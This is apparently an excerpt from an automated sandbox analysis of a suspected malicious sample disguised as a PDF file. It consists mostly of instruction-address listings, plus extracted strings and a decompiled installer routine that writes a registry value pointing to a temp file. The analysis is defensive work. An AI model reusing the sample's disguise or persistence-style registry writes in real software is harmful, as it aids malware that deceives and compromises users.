                                                                      0x00406836
                                                                      0x00406839
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683f
                                                                      0x0040683f
                                                                      0x00406843
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406845
                                                                      0x00406848
                                                                      0x0040684b
                                                                      0x00406875
                                                                      0x0040687b
                                                                      0x00406882
                                                                      0x00000000
                                                                      0x00406882
                                                                      0x0040684d
                                                                      0x00406851
                                                                      0x00406854
                                                                      0x00406859
                                                                      0x00406859
                                                                      0x00406864
                                                                      0x0040686a
                                                                      0x0040686c
                                                                      0x0040686f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068b4
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068ca
                                                                      0x004068d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406889
                                                                      0x00406889
                                                                      0x0040688d
                                                                      0x004070d8
                                                                      0x00000000
                                                                      0x004070d8
                                                                      0x00406899
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a7
                                                                      0x004068aa
                                                                      0x004068ad
                                                                      0x004068b0
                                                                      0x004068b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f58
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f8e
                                                                      0x00406f95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f97
                                                                      0x00406f97
                                                                      0x00406f9b
                                                                      0x0040714a
                                                                      0x00000000
                                                                      0x0040714a
                                                                      0x00406fa7
                                                                      0x00406fae
                                                                      0x00406fb6
                                                                      0x00406fb6
                                                                      0x00406fb6
                                                                      0x00406fb9
                                                                      0x00406fbc
                                                                      0x00406fbc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068da
                                                                      0x004068dc
                                                                      0x004068df
                                                                      0x00406950
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695d
                                                                      0x00406967
                                                                      0x00000000
                                                                      0x00406967
                                                                      0x004068e1
                                                                      0x004068e5
                                                                      0x004068e8
                                                                      0x004068ea
                                                                      0x004068ed
                                                                      0x004068f0
                                                                      0x004068f2
                                                                      0x004068f5
                                                                      0x004068f7
                                                                      0x004068fc
                                                                      0x004068ff
                                                                      0x00406902
                                                                      0x00406906
                                                                      0x0040690d
                                                                      0x00406910
                                                                      0x00406917
                                                                      0x0040691b
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406927
                                                                      0x0040692a
                                                                      0x00406948
                                                                      0x0040694a
                                                                      0x00000000
                                                                      0x0040694a
                                                                      0x0040692c
                                                                      0x0040692f
                                                                      0x00406932
                                                                      0x00406935
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x0040693a
                                                                      0x0040693d
                                                                      0x0040693f
                                                                      0x00406940
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b79
                                                                      0x00406b7d
                                                                      0x00406b9b
                                                                      0x00406b9e
                                                                      0x00406ba5
                                                                      0x00406ba8
                                                                      0x00406bab
                                                                      0x00406bae
                                                                      0x00406bb1
                                                                      0x00406bb4
                                                                      0x00406bb6
                                                                      0x00406bbd
                                                                      0x00406bbe
                                                                      0x00406bc0
                                                                      0x00406bc3
                                                                      0x00406bc6
                                                                      0x00406bc9
                                                                      0x00406bc9
                                                                      0x00406bce
                                                                      0x00000000
                                                                      0x00406bce
                                                                      0x00406b7f
                                                                      0x00406b82
                                                                      0x00406b85
                                                                      0x00406b8f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406be3
                                                                      0x00406be7
                                                                      0x00406c0a
                                                                      0x00406c0d
                                                                      0x00406c10
                                                                      0x00406c1a
                                                                      0x00406be9
                                                                      0x00406be9
                                                                      0x00406bec
                                                                      0x00406bef
                                                                      0x00406bf2
                                                                      0x00406bff
                                                                      0x00406c02
                                                                      0x00406c02
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c26
                                                                      0x00406c2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c30
                                                                      0x00406c34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c3a
                                                                      0x00406c3c
                                                                      0x00406c40
                                                                      0x00406c40
                                                                      0x00406c43
                                                                      0x00406c47
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c97
                                                                      0x00406c9b
                                                                      0x00406ca2
                                                                      0x00406ca5
                                                                      0x00406ca8
                                                                      0x00406cb2
                                                                      0x00000000
                                                                      0x00406cb2
                                                                      0x00406c9d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cbe
                                                                      0x00406cc2
                                                                      0x00406cc9
                                                                      0x00406ccc
                                                                      0x00406ccf
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cd2
                                                                      0x00406cd5
                                                                      0x00406cd8
                                                                      0x00406cd8
                                                                      0x00406cdb
                                                                      0x00406cde
                                                                      0x00406ce1
                                                                      0x00406ce1
                                                                      0x00406ce4
                                                                      0x00406ceb
                                                                      0x00406cf0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d7e
                                                                      0x00406d7e
                                                                      0x00406d82
                                                                      0x00407120
                                                                      0x00000000
                                                                      0x00407120
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d92
                                                                      0x00406d95
                                                                      0x00406d9b
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406973
                                                                      0x00406973
                                                                      0x00406977
                                                                      0x004070e4
                                                                      0x00000000
                                                                      0x004070e4
                                                                      0x0040697d
                                                                      0x00406980
                                                                      0x00406983
                                                                      0x00406987
                                                                      0x0040698a
                                                                      0x00406990
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406995
                                                                      0x00406998
                                                                      0x00406998
                                                                      0x0040699b
                                                                      0x0040699e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069a4
                                                                      0x004069aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069b0
                                                                      0x004069b0
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069bd
                                                                      0x004069c0
                                                                      0x004069c1
                                                                      0x004069c4
                                                                      0x004069c6
                                                                      0x004069cc
                                                                      0x004069cf
                                                                      0x004069d2
                                                                      0x004069d5
                                                                      0x004069d8
                                                                      0x004069db
                                                                      0x004069de
                                                                      0x004069fa
                                                                      0x004069fd
                                                                      0x00406a00
                                                                      0x00406a03
                                                                      0x00406a0a
                                                                      0x00406a0e
                                                                      0x00406a10
                                                                      0x00406a14
                                                                      0x004069e0
                                                                      0x004069e0
                                                                      0x004069e4
                                                                      0x004069ec
                                                                      0x004069f1
                                                                      0x004069f3
                                                                      0x004069f5
                                                                      0x004069f5
                                                                      0x00406a17
                                                                      0x00406a1e
                                                                      0x00406a21
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a2c
                                                                      0x00406a2c
                                                                      0x00406a30
                                                                      0x004070f0
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x00406a36
                                                                      0x00406a39
                                                                      0x00406a3c
                                                                      0x00406a40
                                                                      0x00406a43
                                                                      0x00406a49
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4e
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a57
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a59
                                                                      0x00406a5c
                                                                      0x00406a5f
                                                                      0x00406a62
                                                                      0x00406a65
                                                                      0x00406a68
                                                                      0x00406a6b
                                                                      0x00406a6e
                                                                      0x00406a71
                                                                      0x00406a74
                                                                      0x00406a77
                                                                      0x00406a8f
                                                                      0x00406a92
                                                                      0x00406a95
                                                                      0x00406a98
                                                                      0x00406a9b
                                                                      0x00406a9f
                                                                      0x00406aa1
                                                                      0x00406a79
                                                                      0x00406a79
                                                                      0x00406a81
                                                                      0x00406a86
                                                                      0x00406a88
                                                                      0x00406a8a
                                                                      0x00406a8a
                                                                      0x00406aa4
                                                                      0x00406aab
                                                                      0x00406aae
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00406aae
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406af0
                                                                      0x00406af0
                                                                      0x00406af4
                                                                      0x004070fc
                                                                      0x00000000
                                                                      0x004070fc
                                                                      0x00406afa
                                                                      0x00406afd
                                                                      0x00406b00
                                                                      0x00406b04
                                                                      0x00406b07
                                                                      0x00406b0d
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b15
                                                                      0x00406b1b
                                                                      0x00406ab9
                                                                      0x00406ab9
                                                                      0x00406abc
                                                                      0x00000000
                                                                      0x00406abc
                                                                      0x00406b1d
                                                                      0x00406b1d
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00406b26
                                                                      0x00406b29
                                                                      0x00406b2c
                                                                      0x00406b2f
                                                                      0x00406b32
                                                                      0x00406b35
                                                                      0x00406b38
                                                                      0x00406b3b
                                                                      0x00406b53
                                                                      0x00406b56
                                                                      0x00406b59
                                                                      0x00406b5c
                                                                      0x00406b5f
                                                                      0x00406b63
                                                                      0x00406b65
                                                                      0x00406b3d
                                                                      0x00406b3d
                                                                      0x00406b45
                                                                      0x00406b4a
                                                                      0x00406b4c
                                                                      0x00406b4e
                                                                      0x00406b4e
                                                                      0x00406b68
                                                                      0x00406b6f
                                                                      0x00406b72
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406e01
                                                                      0x00406e01
                                                                      0x00406e05
                                                                      0x0040712c
                                                                      0x00000000
                                                                      0x0040712c
                                                                      0x00406e0b
                                                                      0x00406e0e
                                                                      0x00406e11
                                                                      0x00406e15
                                                                      0x00406e18
                                                                      0x00406e1e
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406bd1
                                                                      0x00406bd1
                                                                      0x00406bd4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f10
                                                                      0x00406f14
                                                                      0x00406f36
                                                                      0x00406f39
                                                                      0x00406f43
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00406f16
                                                                      0x00406f19
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f20
                                                                      0x00406f23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406fcd
                                                                      0x00406fd1
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406ff6
                                                                      0x00406ffd
                                                                      0x00407004
                                                                      0x00407004
                                                                      0x00000000
                                                                      0x00407004
                                                                      0x00406fd3
                                                                      0x00406fd6
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00406fe3
                                                                      0x00406f27
                                                                      0x00406f27
                                                                      0x00406f2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070be
                                                                      0x004070c1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cf8
                                                                      0x00406cfa
                                                                      0x00406d01
                                                                      0x00406d02
                                                                      0x00406d04
                                                                      0x00406d07
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d17
                                                                      0x00406d19
                                                                      0x00406d19
                                                                      0x00406d1a
                                                                      0x00406d1d
                                                                      0x00406d24
                                                                      0x00406d27
                                                                      0x00406d35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040700b
                                                                      0x0040700b
                                                                      0x0040700e
                                                                      0x00407015
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040701a
                                                                      0x0040701a
                                                                      0x0040701e
                                                                      0x00407156
                                                                      0x00000000
                                                                      0x00407156
                                                                      0x00407024
                                                                      0x00407027
                                                                      0x0040702a
                                                                      0x0040702e
                                                                      0x00407031
                                                                      0x00407037
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x0040703c
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x00407042
                                                                      0x00407042
                                                                      0x00407046
                                                                      0x004070a6
                                                                      0x004070a9
                                                                      0x004070ae
                                                                      0x004070af
                                                                      0x004070b1
                                                                      0x004070b3
                                                                      0x004070b6
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00406fc2
                                                                      0x00407048
                                                                      0x0040704e
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407057
                                                                      0x0040705a
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407063
                                                                      0x00407066
                                                                      0x00407069
                                                                      0x00407082
                                                                      0x00407085
                                                                      0x00407088
                                                                      0x0040708b
                                                                      0x0040708f
                                                                      0x00407091
                                                                      0x00407091
                                                                      0x00407092
                                                                      0x00407095
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x00407073
                                                                      0x00407078
                                                                      0x0040707a
                                                                      0x0040707d
                                                                      0x0040707d
                                                                      0x00407098
                                                                      0x0040709f
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x00406d3d
                                                                      0x00406d40
                                                                      0x00406d76
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea9
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eae
                                                                      0x00407138
                                                                      0x00000000
                                                                      0x00407138
                                                                      0x00406eb4
                                                                      0x00406eb7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ebd
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00000000
                                                                      0x00406ec4
                                                                      0x00406d42
                                                                      0x00406d44
                                                                      0x00406d46
                                                                      0x00406d48
                                                                      0x00406d4b
                                                                      0x00406d4c
                                                                      0x00406d4e
                                                                      0x00406d50
                                                                      0x00406d53
                                                                      0x00406d56
                                                                      0x00406d6c
                                                                      0x00406d71
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dad
                                                                      0x00406dd9
                                                                      0x00406ddb
                                                                      0x00406de2
                                                                      0x00406de5
                                                                      0x00406de8
                                                                      0x00406de8
                                                                      0x00406ded
                                                                      0x00406ded
                                                                      0x00406def
                                                                      0x00406df2
                                                                      0x00406df9
                                                                      0x00406dfc
                                                                      0x00406e29
                                                                      0x00406e29
                                                                      0x00406e2c
                                                                      0x00406e2f
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00000000
                                                                      0x00406ea3
                                                                      0x00406e31
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e40
                                                                      0x00406e43
                                                                      0x00406e46
                                                                      0x00406e49
                                                                      0x00406e4c
                                                                      0x00406e4f
                                                                      0x00406e52
                                                                      0x00406e6b
                                                                      0x00406e6d
                                                                      0x00406e70
                                                                      0x00406e71
                                                                      0x00406e74
                                                                      0x00406e76
                                                                      0x00406e79
                                                                      0x00406e7b
                                                                      0x00406e7d
                                                                      0x00406e80
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e89
                                                                      0x00406e8b
                                                                      0x00406e8b
                                                                      0x00406e8c
                                                                      0x00406e8f
                                                                      0x00406e92
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e5c
                                                                      0x00406e61
                                                                      0x00406e63
                                                                      0x00406e66
                                                                      0x00406e66
                                                                      0x00406e95
                                                                      0x00406e9c
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406e9c
                                                                      0x00406daf
                                                                      0x00406db2
                                                                      0x00406db4
                                                                      0x00406db7
                                                                      0x00406dba
                                                                      0x00406dbd
                                                                      0x00406dbf
                                                                      0x00406dc2
                                                                      0x00406dc5
                                                                      0x00406dc5
                                                                      0x00406dc8
                                                                      0x00406dc8
                                                                      0x00406dcb
                                                                      0x00406dd2
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00406dd2
                                                                      0x00406d58
                                                                      0x00406d5b
                                                                      0x00406d5d
                                                                      0x00406d60
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406abf
                                                                      0x00406abf
                                                                      0x00406ac3
                                                                      0x00407108
                                                                      0x00000000
                                                                      0x00407108
                                                                      0x00406ac9
                                                                      0x00406acc
                                                                      0x00406acf
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad8
                                                                      0x00406adb
                                                                      0x00406add
                                                                      0x00406ae0
                                                                      0x00406ae3
                                                                      0x00406ae6
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c4a
                                                                      0x00406c4a
                                                                      0x00406c4e
                                                                      0x00407114
                                                                      0x00000000
                                                                      0x00407114
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c5a
                                                                      0x00406c5d
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c62
                                                                      0x00406c65
                                                                      0x00406c68
                                                                      0x00406c6b
                                                                      0x00406c6e
                                                                      0x00406c71
                                                                      0x00406c72
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c77
                                                                      0x00406c7a
                                                                      0x00406c7d
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c83
                                                                      0x00406c85
                                                                      0x00406c85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ecb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed1
                                                                      0x00406ed4
                                                                      0x00406ed7
                                                                      0x00406eda
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edf
                                                                      0x00406ee2
                                                                      0x00406ee5
                                                                      0x00406ee8
                                                                      0x00406eeb
                                                                      0x00406eee
                                                                      0x00406eef
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef4
                                                                      0x00406ef7
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f00
                                                                      0x00406f04
                                                                      0x00406f06
                                                                      0x00406f09
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00406c88
                                                                      0x00406c88
                                                                      0x00000000
                                                                      0x00406c88
                                                                      0x00406f09
                                                                      0x0040713e
                                                                      0x00407160
                                                                      0x00407166
                                                                      0x00407168
                                                                      0x0040716f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00407175
                                                                      0x00407175
                                                                      0x00000000

                                                                      Strings
                                                                      • <?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3, xrefs: 00406735
                                                                      • B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405, xrefs: 0040672B
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3$B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405
                                                                      • API String ID: 0-201836575
                                                                      • Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                                      • Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
                                                                      • Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                                      • Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004023EA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 973 4023ea-402430 call 402d48 call 402c53 * 2 RegCreateKeyExW 980 402436-40243e 973->980 981 402adb-402aea 973->981 983 402440-40244d call 402c53 lstrlenW 980->983 984 402451-402454 980->984 983->984 987 402456-402467 call 402c31 984->987 988 402468-40246b 984->988 987->988 989 40247c-402490 RegSetValueExW 988->989 990 40246d-402477 call 40317b 988->990 995 402492 989->995 996 402495-402573 RegCloseKey 989->996 990->989 995->996 996->981 998 4028a1-4028a8 996->998 998->981
                                                                      C-Code - Quality: 86%
                                                                      			E004023EA(void* __eax, intOrPtr __edx) {
				void* _t18;
				short* _t21;
				int _t22;
				long _t25;
				char _t27;
				int _t30;
				intOrPtr _t35;
				intOrPtr _t39;
				void* _t41;

				_t35 = __edx;
				_t18 = E00402D48(__eax);
				_t39 =  *((intOrPtr*)(_t41 - 0x18));
				 *(_t41 - 0x50) =  *(_t41 - 0x14);
				 *(_t41 - 0x38) = E00402C53(2);
				_t21 = E00402C53(0x11);
				_t34 =  *0x42a2f0 | 0x00000002;
				 *(_t41 - 4) = 1;
				_t22 = RegCreateKeyExW(_t18, _t21, _t30, _t30, _t30,  *0x42a2f0 | 0x00000002, _t30, _t41 + 8, _t30); // executed
				if(_t22 == 0) {
					if(_t39 == 1) {
						E00402C53(0x23);
						_t22 = lstrlenW(0x40b5d8) + _t29 + 2;
					}
					if(_t39 == 4) {
						_t27 = E00402C31(3);
						_pop(_t34);
						 *0x40b5d8 = _t27;
						 *((intOrPtr*)(_t41 - 0x30)) = _t35;
						_t22 = _t39;
					}
					if(_t39 == 3) {
						_t22 = E0040317B(_t34,  *((intOrPtr*)(_t41 - 0x1c)), _t30, 0x40b5d8, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t41 + 8),  *(_t41 - 0x38), _t30,  *(_t41 - 0x50), 0x40b5d8, _t22); // executed
					if(_t25 == 0) {
						 *(_t41 - 4) = _t30;
					}
					_push( *(_t41 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t41 - 4);
				return 0;
			}












                                                                      0x004023ea
                                                                      0x004023eb
                                                                      0x004023f0
                                                                      0x004023fa
                                                                      0x00402404
                                                                      0x00402407
                                                                      0x00402417
                                                                      0x00402421
                                                                      0x00402428
                                                                      0x00402430
                                                                      0x0040243e
                                                                      0x00402442
                                                                      0x0040244d
                                                                      0x0040244d
                                                                      0x00402454
                                                                      0x00402458
                                                                      0x0040245d
                                                                      0x0040245e
                                                                      0x00402464
                                                                      0x00402467
                                                                      0x00402467
                                                                      0x0040246b
                                                                      0x00402477
                                                                      0x00402477
                                                                      0x00402488
                                                                      0x00402490
                                                                      0x00402492
                                                                      0x00402492
                                                                      0x00402495
                                                                      0x0040256d
                                                                      0x0040256d
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nssE334.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nssE334.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nssE334.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nssE334.tmp
                                                                      • API String ID: 1356686001-2639778764
                                                                      • Opcode ID: f18aa87aa6b79811d6adea6c6b4f71fd68a91caefea6bf7c60a3fb0ca3464567
                                                                      • Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
                                                                      • Opcode Fuzzy Hash: f18aa87aa6b79811d6adea6c6b4f71fd68a91caefea6bf7c60a3fb0ca3464567
                                                                      • Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405E16 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
